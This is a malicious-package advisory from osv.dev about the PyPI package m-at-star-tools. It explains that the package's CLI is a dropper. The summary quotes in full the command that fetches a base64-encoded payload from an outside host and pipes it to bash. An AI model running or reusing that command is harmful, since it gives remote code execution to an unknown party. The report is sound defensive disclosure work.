m-at-star-tools @1.0.4
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4812
Ecosystem
pypi
Summary
The package's sole console_script m0scan (m0scan/main.py:6-7) executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash , fetching an opaque base64-encoded shell payload from a dynamic-DNS-style host ( mspy.qzz.io ) unrelated to any publisher infrastructure and piping it directly to bash. The fetch is unpinned, unverified (no hash, no signature), obfuscated (base64), and points at a mutable URL — whoever controls mspy.qzz.io/M0scan controls arbitrary code execution on every user who runs the tool. Package metadata is throwaway: author M-AT-STAR , generic GitHub homepage, 5-byte README, no email or license. The package self-describes as an 'M0scan installation wrapper' — the wrapper IS the dropper. Any invocation of the documented CLI yields full attacker code execution on the installer's machine.
Source: amazon-inspector (2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.